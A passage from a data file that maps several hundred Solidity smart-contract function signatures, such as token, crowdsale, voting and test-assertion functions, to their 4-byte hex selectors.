"0xeb4dd8f2", "setReward(address[],uint256[])": "0x85eddeea", "setReward(address,uint256)": "0xeacccaf0", "rewardEthAnd(address[])": "0x99b721a5", "reward()": "0x228cb733", "IssueBank(address)": "0xdd0d74ff", "close(uint256,uint256)": "0x596c8976", "setClaimer(uint256,address,uint256)": "0x09fd018e", "open(uint256)": "0x690e7c09", "withdrawal(address,uint256)": "0x5a6b26ba", "tokenFallback(address,uint256,bytes)": "0xc0ee0b8a", "claimWithResolver(address,address)": "0x0f5a5466", "setResolver(address)": "0x4e543b26", "DefaultReverseResolver(address)": "0xa21174bb", "setText(bytes32,string,string)": "0x10f13a8c", "text(bytes32,string)": "0x59d1d43c", "storeBlockWithFeeAndRecipient(bytes,int256,int256)": "0x90fa337d", "getShares(address)": "0xf04da65b", "updateShares(uint256)": "0xb6608467", "unvest(uint256,uint256,uint256,uint256,uint256,bool)": "0x776d1a01", "undefined()": "0x3af39c21", "trust(address)": "0x4637d827", "sweep(address,uint256)": "0x6ea056a9", "stand(uint256)": "0x96b76c23", "signature(string,bytes32)": "0xae0a6b28", "puzzle(address,bytes32,bytes32)": "0x4b59e880", "puzzle(address,bytes32)": "0x3da5c3ce", "notarize(string)": "0x7183616c", "hit(uint256)": "0xebf6e91d", "Contribute(bytes20)": "0xc7f2e6af", "activate(bool,bool)": "0xa7abc124", "append(string,string)": "0x591c515f", "claim(address,string)": "0xa8d95fb2", "create(address[],uint256,uint256)": "0x53d9d910", "forward(address,bool)": "0x77fcb91d", "offer(uint256,address,uint256,address)": "0xf09ea2a6", "set(uint256,string)": "0x64371977", "addUser(uint256,address)": "0x58d9fa04", "add(string,address)": "0x2bffc7ed", "request(bytes32)": "0x59c87d70", "request()": "0x338cdca1", "betOnColor(bool)": "0x5521d17b", "betOnLowHigh(bool)": "0xac940823", "setTokenHolder(address,address)": "0x74a93e6c", "redeem(address,uint256)": "0x1e9a6950", "convert(address)": "0xdef2489b", "convert(uint256)": "0xa3908e1b", "buyTile(uint256)": "0x329ce29e", "update(bytes32)": "0x8b147245", "fund(uint256)": "0xca1d209d", "confirmTransaction(bytes32)": "0x79716e43", "add(address,bytes32)": "0x2d580ef6", "addUser(address,uint256)": "0xd3017193", "deploy(address,address)": "0x545e7c61", "notify(address,uint256)": "0x25fda176", "release(uint256)": "0x37bdc99b", "totalGames()": "0x2c4e591b", "totalBetValue()": "0x4ce01d86", "totalBetCount()": "0xb599afc8", "SmartRoulette()": "0xf0caea2b", "setSmartAffiliateContract(address)": "0x53c84526", "setProfitDistributionContract(address)": "0xeb5904c0", "register(address,address)": "0xaa677354", "ProcessGame(uint256,uint256)": "0xa24d23eb", "ProcessGames(uint256[],bool)": "0x665bcc32", "ProcessGameExt(uint256)": "0x89abeb19", "preliminaryGameResult(uint64)": "0xfe73e3ec", "placeBet(uint256,bytes32,bytes32)": "0x257bcd6a", "isOperationBlocked()": "0x15cff546", "isBitSet(uint256,uint8)": "0x3cf885c4", "getTokenSettings()": "0x267127ec", "getRandomNumber(address,uint256)": "0xf84f420b", "getIndex(uint16,uint16)": "0x824d5603", "getGame(uint64)": "0x49041903", "getGameResult()": "0xb3fb14ad", "GetGameIndexesToProcess()": "0xd02528e6", "getDistributeProfitsInfo()": "0x38f77d69", "getCoeff(uint16)": "0x03ee8f08", "getBetValue(bytes32,uint8)": "0x6d12301c", "getBetValueByGamble(uint8)": "0x2fd6d40b", "getBetsProcessed()": "0x9eb9dd3b", "getAffiliateInfo(address)": "0x7a8df1b9", "emission(address,address,uint256,uint16,uint16)": "0x364f4896", "emergencyFixGameResult(uint64,uint256)": "0x0f590c36", "distributeProfits(uint256)": "0x9a969768", "AgiCrowdsale(address,address,uint256,uint256,uint256,uint256,uint256)": "0x9c7ed6cb", "getLastMulti()": "0x9356e87f", "createMulti(uint256,uint256)": "0x641620a2", "getLastSingle()": "0x9e87c1c6", "createSingle(uint256)": "0xe0a53397", "getAllAuditors()": "0x4dcbb8ee", "getAuditor(address)": "0x2b2badb3", "transfer(address,address,address)": "0x7138bc92", "unregister(address,address)": "0x4a45b60b", "applyKarmaDiff(address,uint256[2])": "0xcd6f7fdb", "DToken()": "0x19c5b89c", "Withdraw()": "0x57ea89b6", "payBounties(address[],uint256[])": "0x3ae033a0", "airdropsTokens(address[],uint256[])": "0xc37cb1ae", "payBountyManager()": "0xd8d5a200", "change_bounty_manager(address)": "0x8279ea54", "Bounty(uint256)": "0x80bc150d", "DifficultyOracle(uint256)": "0x2de39dbe", "b()": "0x4df7e3d0", "zeroBool()": "0x23a58576", "zeroAddress()": "0x0930907b", "zeroBytes()": "0x7a6b8361", "zeroUInt()": "0x29325ebd", "zeroInt()": "0x47e2d3f5", "viewReputation(address)": "0xfc70b462", "giveReputation(address,bool,string)": "0xa3e20625", "trade(address)": "0x056ba056", "addUser(string,string)": "0x079eaf34", "getTransactionFee(uint256)": "0xdfc7d488", "checkContract(address)": "0xd7b12454", "_burn(address,uint256)": "0x6161eb18", "_approve(address,uint256,uint256)": "0x002fd07c", "_mint(int256,address,uint256)": "0xe8387af8", "_processTransactionFee(address,uint256)": "0x6965193f", "_transfer(address,address,uint256,bool)": "0xba4c825e", "_transferToContract(address,address,uint256,bytes)": "0x6a140b27", "burn(address,uint256)": "0x9dc29fac", "processTransactionFee(address,uint256)": "0x3491d0f1", "transferFromByModule(address,address,uint256,bool)": "0x4dc73428", "approveAndCall(address,uint256,uint256,bytes)": "0x381731be", "approve(address,uint256,uint256)": "0x426a8493", "token(address,address)": "0xfdc292ea", "replaceModule(address)": "0x423f0b6e", "connectModule()": "0x6d6d70d9", "setAccountProvider(uint8,address)": "0x47fafe7d", "setStorage(address)": "0x9137c1a7", "Lookup()": "0x45cb9994", "transferableTokens(address,uint64)": "0xd347c205", "IsArt()": "0x36a1c184", "SimpleAuction(uint256,address)": "0xffb3401d", "queryImage(address,bytes)": "0xb4099ff7", "registerImage(uint256,bytes,uint256)": "0x5077ac0e", "DaoHubVerify()": "0x4ee0b9a9", "calculateBonus(address)": "0x7319e5aa", "payBonus()": "0x1c95b42e", "transferCreator(address)": "0xfa3fa196", "Creatable()": "0x363a0903", "giveRightVote(address)": "0xa077c657", "implementation()": "0x5c60da1b", "proxyType()": "0x4555d5c9", "KernelProxy(address)": "0x11f4a9ce", "modifierEx()": "0x921456e7", "verifyProof(bytes,bytes32,bytes32)": "0x101f13e2", "createTokens(address)": "0xcedbbeee", "balance(string)": "0x3d80b532", "withdraw(string)": "0x31fb67c2", "checkAccess(string,address)": "0x44a08b36", "buyAccess(string)": "0xa834c43d", "getTime(string)": "0xb359cedd", "getOwner(string)": "0x4aaf4a12", "getRecord(string)": "0x11dd8845", "isRegistered(string)": "0xc822d7f0", "toggleActive(string)": "0xb1574b38", "update(string,string,bool,string,address,uint256,uint256)": "0x0fac8dc5", "register(string,string,bool,string,address,uint256,uint256)": "0x6e080d86", "StorageBase(address)": "0x2436d5f8", "a()": "0x0dbe671f", "SuicideContract()": "0x7c6e607d", "setHash(address,bytes32,address,bytes32,uint256,uint256)": "0x63bb51a9", "getWriteTimestamp(bytes32)": "0xc35ef892", "setHashByProvider(address,bytes32,bytes32)": "0x19a32f66", "setHashByWriter(address,bytes32,address,bytes32)": "0xfe23baea", "create(address,bytes32,address,bytes32,bytes32,address,bytes32)": "0x31ba7ede", "SimpleConstructorArray(uint256[3],uint256[3])": "0xf5c4ceda", "SimpleConstructorBytes(bytes32,bytes32)": "0x459b0d97", "SimpleConstructorString(string,string)": "0x786bfd76", "SimpleConstructorBool(bool,bool)": "0x0b354090", "SimpleConstructorInt(uint256,uint256)": "0x309e63e5", "TokenVesting(address,uint256,uint256,uint256,bool)": "0x3a669dd9", "testNopUnroll16(int256,int256,uint256)": "0xebbbe00b", "testNop(int256,int256,uint256)": "0xce67bda6", "testExpUnroll16(int256,int256,uint256)": "0x3c77b95c", "testExp(int256,int256,uint256)": "0x3392ffc8", "put()": "0x549262ba", "HoneyPot()": "0x04d0fefe", "_processPurchase(address,uint256)": "0xd29db7e4", "release()": "0x86d1a69f", "callSender(bytes4)": "0x0a2df1ed", "getString()": "0x89ea642f", "setString(string)": "0x7fcaf666", "presaleEnd()": "0x229f3e29", "totalETHRaised()": "0x28f5c7b3", "ticketsFaceToFaceSold()": "0x1e9f6dcb", "stage1Tokens()": "0xeac12cae", "haltIco()": "0xe489c5ff", "tokenRateWei()": "0xd5ee739d", "vestingPeriodInMonths()": "0xc1c3eccf", "tokensForReserve()": "0x80fa7942", "_bonusTime1()": "0x1cf28ae3", "deathData_a1()": "0xe046f06f", "numberOfRazzes()": "0x6fac46e5", "getAllTimes()": "0x6139faa6", "addressAdvisoryBountyTeam()": "0x062d4a34", "triggerFailFlags()": "0x94d1b7e8", "whitelistedInvestorCounter()": "0x8a76a63e", "calcToken()": "0xd3f01fbd", "totalAvaliableSupply()": "0xdf2fbae6", "tCampaignStart()": "0xa220d6c4", "closeStageOne()": "0x3ce3480a", "adminPool()": "0xb86a1fb2", "blockDuration()": "0x201e908e", "preIcoMinInvest()": "0x79217982", "round4Sold()": "0x6bb3c065", "CROWDSALE_START()": "0x13ddb69a", "notifier()": "0x09276ea4", "unlockedTeamStorageVault()": "0x7160138c", "remainingPublicSaleCap()": "0x8f158e76", "PRE_SALE_4WEEK_BONUS()": "0x5cc8a6ed", "maxTxSize()": "0x7e150d66", "partner2()": "0x8b35a244", "changeNameOperation()": "0xe5254036", "starting_giveaway()": "0xe2ba600e", "registered()": "0x2de40ce3", "receiverTwo()": "0x061ab664", "previousUpdateTime()": "0x347820eb", "twoMillionFourHundredThousand()": "0xe8ac764b", "OOREDOOCHAIN()": "0x54accc88", "passoverStartTime()": "0x9d61193a", "startTimeRefund()": "0x750fd1d1", "adventureSettingContract()": "0x8144ee2f", "fiveHundredThousand()": "0x000e02d0", "usechainWallet()": "0xd24bcb15", "mediatorWallet()": "0x42a38a00", "burner_addr()": "0xf86b0669", "level_6_amount()": "0x6f8ee91c", "getUnsoldPeriod()": "0xcda3c001", "Timestamp()": "0xe6369e41", "tier1Start()": "0xa0bdb04e", "canReceiveMintWhitelist()": "0x42995e12", "pausedOwnerAdmin()": "0x64779ad7", "WITHDRAW()": "0x16ba7197", "houseEdgeDivisor()": "0xe5c774de", "ICO_END_TIME()": "0x0a87557c", "mintingFinishedTime()": "0x458b1471", "durationInDays()": "0x54b6ba95", "realVotedSupply()": "0x4dfb10bc", "hashedParameters()": "0xf98e87ba", "votesYes()": "0x8d0fc05a", "Start4()": "0x864a1057", "minSumICOStage8USD()": "0xa6070967", "maximumEther()": "0xbd9ec492", "tgrSettingsPartContributor()": "0xb3a6d09d", "totalUserLost()": "0x59d3d57e", "tokensRemainingStage3()": "0x89a9d6b4", "startGameGas()": "0x830402c1", "numberOfNames()": "0xe98096fc", "PRICE_2()": "0x145000ab", "verificationPeriod()": "0xb1bb7e0f", "TOKENS_FOUNDERS()": "0xf653279c", "refunder()": "0xdf4f5a72", "sameVar()": "0x057bd53f", "minAmountForDeal()": "0x56b30f33", "ZUR()": "0xf8df084d", "weiToRaise()": "0xc7c16353", "withdrawStep()": "0x990e1c9b", "priceBox1()": "0x2d1ced82", "overflowOwner()": "0xf714bf3d", "timelockedTokensDisbursed()": "0x6d50ef2a", "crowdSaleCap()": "0xbb8bcc46", "SendEth()": "0x04f53231", "totalDeposits()": "0x7d882097", "burnPrice()": "0xbde6a5a9", "opensourceFundManager()": "0x1603c521", "c_STQperETH()": "0x6dee275a", "vinciCap()": "0x8ffec6ee", "RANGESTART_7()": "0x168fb79d", "winAmount0()": "0x2a2235f2", "swapContract()": "0x8ea83031", "sealedBy()": "0xd9159f60", "dateEcoRelease3()": "0x7953e0ab", "summPartnerships()": "0x6112c2ab", "isBurnActive()": "0xb1a6676e", "publicKeySize()": "0x37960cd5", "LED_MULTISIG()": "0xa69ade72", "AMOUNT_BASETEAM()": "0xf8bd4498", "getCurrentHash()": "0x7cee919c", "stateEndDate()": "0x5aab1822", "rateRound2()": "0x0a564a03", "newStakesAllowed()": "0x594548d5", "indInflationDeposit()": "0xf0fbc8ac", "getAllVoters()": "0x35bbe70e", "vote(uint256[])": "0xce11f2bb", "CTokenGB()": "0xdb6c7286", "proxyTransfer(address,address,uint256)": "0x4a92fb3a", "proxyMint(address,uint256)": "0x1f471ad0", "BLVToken(uint256,string,string)": "0x8c7fcd46", "HLCToken(address,string,string,uint256,uint8)": "0x003cee5a", "CarlosCoin()": "0x10c49b78", "getFactorybyIndex(uint256)": "0x2e6ccbf6", "getFactoryCount()": "0xd1047434", "deployFactory()": "0xbff18c78", "release(address,address,uint256)": "0x8bfb07c9", "_release(address,address,uint256)": "0x624dee7c", "removeDistributor(address)": "0x57c1f9e2", "addDistributor(address)": "0x7250e224", "getGame(address)": "0x8d1a4b28", "EVenToken()": "0x24e0be2e", "BHNNetwork()": "0xb28f1433", "NarniaUSDT()": "0x0be560be", "LAM()": "0xc33bbe47", "frozenAccount(address,bool)": "0xacd3c39f", "approveAndCall(address,uint256,bytes1)": "0x75885f6a", "receiveApproval(address,uint256,address,bytes1)": "0x9ac08dfd", "BarmatzTestToken()": "0x0d3167da", "FCOIN1519Token(uint256,string,string)": "0xd8485ed6", "XubiToken()": "0x764d9969", "getNewGame()": "0xa2b946aa", "getLastGame()": "0x8310d61c", "addIn(address)": "0xf862d780", "Shabu()": "0xa9430dcb", "FuckKuanLi()": "0x9362917c", "getRegistryVersion()": "0x6d1eab7d", "setAccreditationActive(bytes32,bytes32,bool)": "0x4045c846", "getAccreditationActive(bytes32,bytes32)": "0xdcf00b6e", "RavneetToken()": "0x05ee27a6", "TheTestCompany()": "0xfd2b4f23", "Flercoin()": "0x011e0162", "SixStandardToken(uint256,string,uint8,string)": "0xbcbc758a", "CokecoinTokenTest()": "0x3d937410", "RedBlueToken()": "0x4cd2b343", "Token3G()": "0x37e7a739", "CVDToken()": "0x660f77aa", "Bazzhtoken()": "0x90061292", "SRVSKCOIN()": "0x581aa8a3", "EIP20Token(uint256,string,uint8,string)": "0x5bfb1dab", "isExist(string)": "0x4d3d096b", "HashBlock()": "0xae83ed91", "playerinfo(address)": "0xbe96031e", "redeemablevilsinfo(address)": "0xf1522d53", "soldiersinfo(address)": "0x12c3f757", "gotchinfo(address)": "0xce52242e", "villageinfo(uint256)": "0x81c0ddc3", "FCOIN1346Token(uint256,string,string,uint256)": "0xd4bb1f28", "sendTokensWithLock(address,uint256,bool)": "0x19e0a0cf", "batchVipWtihLock(address[],uint256[],bool)": "0xf4ac6560", "batchAirdropWithLock(address[],uint256,bool)": "0x428eb006", "batchLockArray(address[],uint256[])": "0x731859bc", "batchLock(address[],uint256)": "0xffad4fc1", "SmartParkApp()": "0x5e1665f3", "addToLists(address,bool,bool)": "0x82fef47d", "TheSwifthDAICO(address,address,address,address,address,address,address,address)": "0xee3a8816", "KTCToken()": "0xcbd57134", "TestToken(address,address,address,address)": "0xcb5fd01f", "aCASATest()": "0xdf034db8", "getFcontracts(address)": "0x01b14149", "updateFcontracts(uint256)": "0x526825af", "insure()": "0x3c3ce17d", "TRONIC()": "0xbe4c9e96", "close(uint256,bytes)": "0x415ffba7", "isValidSignature(uint256,bytes)": "0xb2af9362", "SSA()": "0xb08f965e", "forceTransferFrom(address,address,uint256)": "0x39298633", "ApproveERC20(address)": "0xf74715cb", "DepositEther(address)": "0xb4b857d8", "ExecuteTrade(uint256,address,address,uint256,uint256)": "0xa22838b9", "myohoTest()": "0x5512a8d8", "GadielToken()": "0x720e2a06", "createEscrow(address,uint256,address)": "0xb6d6806c", "allocateBulkTokens(address[],uint256[])": "0xa23c86c0", "Satochi()": "0xc94dc71e", "PMCToken(address,uint256)": "0x2e02b24c", "SmartBonds()": "0x465c2cec", "getReleaseTime()": "0x53462d6b", "defineWinner()": "0xec7fec8b", "announce(uint256)": "0xd1940a16", "DAToken(uint256,string,uint8,string)": "0x7edaca89", "JNDToken()": "0xfd09b6f0", "HULKtoken()": "0x36760fd2", "EVNT()": "0xae49a717", "TopforceCoin(uint256,string,uint8,string)": "0xf8840c38", "isAccountBlocked(address)": "0xca88bd5b", "unblockAccount(address)": "0x4d78fdc6", "DASToken()": "0xca01b37c", "__transfer(address,address,uint256,bytes)": "0x5f1e1c28", "erc223Fallback(address,uint256,bytes)": "0xa7b4b60f", "IDK()": "0x8a570230", "AcceptsIDK(address)": "0x88aaa229", "ZeroXEth()": "0xd7203294", "MTOKEN()": "0x31088032", "ZOINToken()": "0x92c31e61", "getForge(uint256)": "0xd8f248b8", "CoderForge()": "0x3562a1db", "getId()": "0x5d1ca631", "getNodes(uint256)": "0x47de074f", "getStatus(uint256)": "0x5c622a0e", "disableChain(uint256)": "0x33e67012", "enableChain(uint256)": "0x4f082843", "newChain(address[])": "0x04990162", "testTransfer(address)": "0x4d5b608b", "average(uint256,uint256)": "0x2b7423ab", "dist(uint256,uint256)": "0x6f8d998c", "fetchGiven(address,bytes32)": "0xd7ab2770", "fetchBilateral(address,bytes32)": "0xf563424e", "fetchConfirm(address,bytes32)": "0x3c0ce567", "createOrder(address,bytes32,bytes32,address,uint256,uint256,uint256)": "0xb39ca258", "refundOrder(address,address,address,bytes32,address,address)": "0x780211a2", "payFee(address,address,address,bytes32,address,address,bool)": "0x34fe0cf5", "fillOrder(address,address,address,bytes32,address,address,uint256)": "0x433bb0e4", "computeCost(address,bytes32,bool)": "0xe81b53d0", "completeOrder(address,address,address,address,bytes32,uint256)": "0x2f6b9099", "bilateralCancel(address,address,address,address,bytes32)": "0x442f52ab", "cancelOrder(address,address,address,address,bytes32)": "0xb1649a2d", "confirmOrder(address,address,address,address,bytes32)": "0x511eb8da", "makeOrder(address,address,bytes32,uint256,uint256)": "0x976bdba4", "shrink128(uint256)": "0xe968d087", "showMeTheMoney(address,uint256)": "0x97c5ed1e", "containMinValueFromOther(uint256,address)": "0x0e1fa28f", "copyPopRequest()": "0xb216c15d", "replaceInFrontRequest(address,uint256)": "0x7c19e1f0", "QueueDemandesEnCours()": "0x9cca7ac3", "withdraw(uint256,address,address)": "0xb460af94", "creationTime(address)": "0xbc632a21", "withdrawnFrom(address)": "0x51867b19", "work(bytes32[])": "0x3ee6de34", "submitProof(bytes32,bytes32[],uint256)": "0x9229e3cd", "dataMerkle(bytes32[],uint256,uint256)": "0x21e69b42", "userCampaigns(address,uint256)": "0x19ac74bd", "newCampaign(bytes32,bytes32,bytes32,address,uint256,uint256,uint256,address)": "0xc06f4c1d", "onPayout(uint256,uint256)": "0x484ec26c", "onRefund(uint256,address,uint256)": "0xb71f3cde", "onContribute(uint256,address,uint256)": "0x0049f068", "onNewCampaign(uint256,address,uint256)": "0x43ca9d26", "create(address,address)": "0x3e68680a", "closeTransaction(uint256)": "0x47e5bec3", "confirmTransaction(uint256,address,uint256)": "0x648e625a", "cancelTransaction(uint256)": "0x3380c0d8", "createTransaction(uint256,address)": "0x7cf4c543", "getReputation(address)": "0x9c89a0e2", "SetDesignatedRouterSRV(bytes32,uint256,bytes,bytes)": "0x976160fa", "RetractRoutingNS(bytes32,bytes32,uint256,bytes)": "0x7b40b291", "RetractRoutingDR(bytes32,bytes32,uint256,bytes)": "0x4517bd42", "AcceptRouting(bytes32,bytes32,uint256,bytes)": "0xa46a1219", "OfferRouting(bytes32,bytes32,uint256,bytes)": "0x2671b61d", "transferLockedTokensBackToUser(uint256)": "0xa4b1b020", "setMinBalanceForContractCreation(uint256)": "0x4f1e4334", "setLockQtyToAllowTrading(uint256)": "0x3cad7c4e", "getLockedBalanceForUser(address,address)": "0xaafd775e", "unlockTokens(address,uint256)": "0x9d564d9a", "lockTokensForTradingMarketContract(address,uint256)": "0xd229a94a", "isBalanceSufficientForContractCreation(address)": "0x84281dcc", "isUserEnabledForContract(address,address)": "0xcfab472f", "MarketToken(uint256,uint256)": "0xc8b4c5b8", "getVoteResults()": "0x86a66dc3", "cancelVote()": "0x95c96554", "registerVoter(address)": "0x38db6dd3", "getNbCitizensLocation(string)": "0xcc5f09fb", "getCitizenLocation(address)": "0x0dcad340", "updateMe(string)": "0x80febdbd", "getProducts(address)": "0x1691473c", "registerProduct(uint256,string)": "0xbc05d087", "assertEq32(bytes32,bytes32)": "0x47428855", "assertEq32(bytes32,bytes32,bytes32)": "0xb017d808", "assertEq31(bytes31,bytes31)": "0xfc037776", "assertEq31(bytes31,bytes31,bytes32)": "0xf43313b6", "assertEq30(bytes30,bytes30)": "0xe504862b", "assertEq30(bytes30,bytes30,bytes32)": "0x066b0380", "assertEq29(bytes29,bytes29)": "0xb8d3d08a", "assertEq29(bytes29,bytes29,bytes32)": "0xe695c00c", "assertEq28(bytes28,bytes28)": "0x6ec62f29", "assertEq28(bytes28,bytes28,bytes32)": "0x7963b478", "assertEq27(bytes27,bytes27)": "0x0b0788dc", "assertEq27(bytes27,bytes27,bytes32)": "0x0a3d7cce", "assertEq26(bytes26,bytes26)": "0x4c2bc9a9", "assertEq26(bytes26,bytes26,bytes32)": "0x2bdc05c5", "assertEq25(bytes25,bytes25)": "0xe7fa7969", "assertEq25(bytes25,bytes25,bytes32)": "0x2d0daca8", "assertEq24(bytes24,bytes24)": "0xf614fd72", "assertEq24(bytes24,bytes24,bytes32)": "0xd050498e", "assertEq23(bytes23,bytes23)": "0x4b0df486", "assertEq23(bytes23,bytes23,bytes32)": "0x3b81a5a4", "assertEq22(bytes22,bytes22)": "0x6b2f68f5", "assertEq22(bytes22,bytes22,bytes32)": "0x596c02fb", "assertEq21(bytes21,bytes21)": "0x9fb4c63d", "assertEq21(bytes21,bytes21,bytes32)": "0x70ab2822", "assertEq20(bytes20,bytes20)": "0x593af09f", "assertEq20(bytes20,bytes20,bytes32)": "0x787eda49", "assertEq19(bytes19,bytes19)": "0xcfd65fdb", "assertEq19(bytes19,bytes19,bytes32)": "0x538e8ae0", "assertEq18(bytes18,bytes18)": "0x0b967fe7", "assertEq18(bytes18,bytes18,bytes32)": "0x16783ba7", "rewarded(uint256,address)": "0xdb6f9deb", "setRewardClosed(uint256)": "0xe2df15d6", "setRewardOpen(uint256)": "0x60bfe04e", "payBidAllocationFee(bytes32,uint256)": "0xa536ae38", "calcBidAllocationFee(bytes32)": "0x73c90b43", "paidBidAllocationFee(bytes32)": "0x236dd0e8", "clearingPrice(address,bytes32)": "0xd8590f93", "hasClearingPrice(address,bytes32)": "0xbd6a9abb", "isValidSubmitter(address,bytes32)": "0x63ebb3cf", "isSubmitterAccepted(uint256,address)": "0x8ab49873", "rejectClearingPriceSubmission(address,address,bytes32,uint256)": "0xb5c18ea8", "setValidationClosed(uint256)": "0x23d669db", "setValidationOpen(uint256)": "0xb63688d3", "submitClearingPrice(address,bytes32,uint256)": "0xf744538d", "payDeposit(uint256,address,uint256)": "0xc727980a", "setSubmissionClosed(uint256)": "0x9e3e230b", "setSubmissionOpen(uint256)": "0xf2ee8be9", "setPercentAllocationFee(uint256,uint256)": "0xc4b781a8", "setSubmissionDeposit(uint256)": "0x32f72e39", "setClearingPriceCode(bytes)": "0x095b697b", "setBidRegistry(address)": "0x956a2ea7", "percentAllocationFeeDenominator()": "0x9daa9ecd", "percentAllocationFeeNumerator()": "0x39354244", "submissionDeposit()": "0xaa14c39a", "clearingPriceCode()": "0x2d839989", "bidRegistry()": "0x82e615fc", "POMPAMCOIN()": "0x6ffc13ab", "updatePrivateSaleWithMonthlyLockupByIndex(address,uint256,uint256,uint256)": "0x0cbfe979", "getTotalTokensPerArray(uint256[])": "0x7f08ea8f", "addPrivateSaleWithMonthlyLockup(address,uint256[],uint256)": "0x30f857f3", "getLockedTokensPerUser(address)": "0xc28c770a", "getTotalLockedTokensPerUser(address)": "0x40a1f87d", "tokensReadyForRelease(uint256)": "0x930e1173", "releaseLockedTokens(address)": "0x5cbee9ba", "releaseLockedTokensByIndex(address,uint256)": "0xadd2af69", "claimLockedTokens()": "0x3b9c7ac2", "setPrivateSaleAgent(address,bool)": "0xc739d31c", "ShowEmissionRate(uint256)": "0xefc927b9", "RubiksToken()": "0xb835a7fe", "getPercentages()": "0x90f25eb3", "getPeriods()": "0x45c9a558", "getUnlockedPercentage()": "0x21c87627", "HashnodeTenaraCoin()": "0x465ce877", "STRAAToken()": "0x56ebd52d", "signAgreement(bytes32)": "0xbf6896eb", "addAgreement(bytes32,uint256,address[])": "0x9b8d34d9", "isDisclosureSigned(uint256)": "0xa980bb9e", "isAgreementSigned(bytes32)": "0x3788036f", "hasAgreement(uint256)": "0x6f06fdb3", "agreementExists(bytes32)": "0xb5bb0ade", "SingularityTest12()": "0xe56e60f6", "joinGame(address,uint256)": "0xcd762827", "share(uint256)": "0xc3d9c4b4", "joinGame(address,uint256,address,address)": "0x8094ebe3", "_setUserInfo(address,uint256,uint256,address,address)": "0x0850de0c", "BitcoinisDumb()": "0x66505d1d", "changeUnitsPerEth(uint256)": "0x299b861e", "IndonesiaRupiah()": "0x590def78", "IEICrowdsale(uint256,uint256,uint256)": "0xfa713023", "FhnwCoin()": "0xec53589d", "isHodler(address)": "0x52f37c40", "getHodlers()": "0xcce356b5", "calculateShares(uint256)": "0x3ec16194", "removeHodler(address)": "0x16511a67", "addHodler(address,uint64)": "0x716210d8", "KleynCoin()": "0xa8bc362e", "MyTestToken(uint256,string,uint8,string)": "0x169bd52d", "Heronium()": "0xd04807e9", "getPublicKey(bytes32,uint8,bytes32,bytes32)": "0x9699ca16", "getNays(uint256)": "0x676b57ad", "getAyes(uint256)": "0x3dad1583", "isSubjectDestruction(uint256)": "0x7fe846ba", "isSubjectRaiseTap(uint256)": "0x85b018e9", "getReason(uint256)": "0xb7928b4f", "isEnded(uint256)": "0xb66f7a8b", "isStarted(uint256)": "0xabd225e1", "getCurrentVoting()": "0xf1156cdf", "returnTokenMulti(address[])": "0xda2dcea6", "returnToken(address)": "0x924806a0", "finalizeVoting()": "0x2260b98b", "addDestructionProposal(string)": "0xe0d4ea7e", "addRaiseTapProposal(string,uint256)": "0x58b092d7", "updateTap(uint256)": "0x3eda062c", "updateReleasedBalance()": "0x36ee8812", "isStateDestructed()": "0x14b80402", "isStateProjectInProgress()": "0x94248eaa", "isStateInitializing()": "0xe7ea8122", "getReleasedBalance()": "0xe238def9", "selfDestruction()": "0xf80334ae", "raiseTap(uint256)": "0x992ee4b6", "ROBIET()": "0xc5c56740", "unFreezeAccounts(address[])": "0x3a621018", "startWork(uint256,bytes32,bytes32)": "0x43620f24", "accept(uint256,address[],uint256[])": "0x3c89f9d4", "changeBrick(uint256,string,string,string,bytes32[])": "0x89dd9e22", "addBrick(string,string,uint256,string,bytes32[])": "0xbe34dab3", "getBrickIds(uint256,uint256,bytes32[],uint256,uint256,uint256)": "0x10cad69c", "getBrickIdsByBuilder(address)": "0xa7a39daa", "getBrickIdsByOwner(address)": "0x744f4994", "participated(uint256,address)": "0xf8536b94", "SetSaltPassword(bytes32,bytes32)": "0x1fb4bcf8", "RegisterUser(bytes32,bytes32[8])": "0x8366437d", "newDeveloper(address,string)": "0x5eafe515", "DevConSchoolReward()": "0x48686205", "Attestation(string,bool,address)": "0xbc6f712a", "passed(address)": "0x835592f8", "Lesson(address,uint256)": "0xcd342917", "setReward(uint256)": "0x293be456", "DDJDTCoin()": "0x3b750f86", "RewardOffer(address,address,bytes32,uint256,uint256,uint128)": "0x997f35ac", "getAssetHolders()": "0x6e70cb07", "cleanAssetHolders()": "0xab590032", "updateTokens(address,int256)": "0xa13ae1ee", "getAssetBalances(address)": "0x70d02691", "settleAssets()": "0xa39eede8", "updateAssets(address,int256)": "0x5b38a8e6", "updateSettlementInstitution(address)": "0x321022a5", "transferAssets(address,address,uint256)": "0x49f4cc17", "AssetBackedTokens(string,uint8,address)": "0x2af39bab", "MyToken(uint256,string,uint8,string,uint256,uint8,uint256,string,string,string,string,string,string,string)": "0xe117e6f9", "calcSharePrice()": "0x9489fa84", "performCalculations()": "0xa759822b", "getManager()": "0xd5009584", "getLastRequestId()": "0x19c2b4c3", "getModules()": "0xb2494df3", "calcSharePriceAndAllocateFees()": "0x45327fef", "emergencyRedeem(uint256,address[])": "0x8a5ddf9d", "takeOrder(uint256,uint256,uint256)": "0x2cacd13a", "makeOrder(uint256,address,address,uint256,uint256)": "0x335611d9", "shutDown()": "0x10b9e583", "disableRedemption()": "0xdd08b5c9", "enableRedemption()": "0x4721ed6f", "disableInvestment()": "0x148da7f6", "enableInvestment()": "0x0cb0a44b", "redeemAllOwnedAssets(uint256)": "0x14a7945a", "requestRedemption(uint256,uint256,bool)": "0x1cd58891", "requestInvestment(uint256,uint256,bool)": "0x64cd1f69", "ethereumSHA3(bytes20,uint24,uint32)": "0x6d4be70f", "extract20(bytes32)": "0xa817d2de", "split32_20_12(bytes32)": "0x3df86f79", "checkProof(bytes32[],bytes32,bytes32)": "0x72a52851", "taskArray()": "0x1def5033", "createTask(string)": "0x111002aa", "ServiceToken()": "0x88e8e26a", "test_dispersal()": "0x42915914", "getMessage()": "0xce6d41de", "WithConstructorArguments(uint256,bytes32)": "0xf69871e9", "changeVotingRules(address,uint256,uint256)": "0x52091047", "Association(address,uint256,uint256)": "0xe816f76f", "createAssociation(uint256,uint256)": "0x488f231f", "localsStore(address,address)": "0x6551fb11", "Crowdsale(address,address,uint256)": "0xbedca054", "burn()": "0x44df8e70", "__callback(uint256,string)": "0x4c4deecb", "startTimer()": "0xa39f7449", "setInterval(uint256)": "0x22a90082", "Timer()": "0x0b309c93", "test_validShouldBe3_increaseTimeBy30000()": "0xc8cddd61", "test_validShouldBe3_increaseBlocksBy100()": "0x8ab30e9f", "test_validShouldThrow()": "0xb0e09ac0", "test_validShouldBe3_2()": "0xaef0ef2e", "test_1_validShouldBe5()": "0x5762f25f", "forward(bytes32[],uint8,bytes32,bytes32)": "0x262c3666", 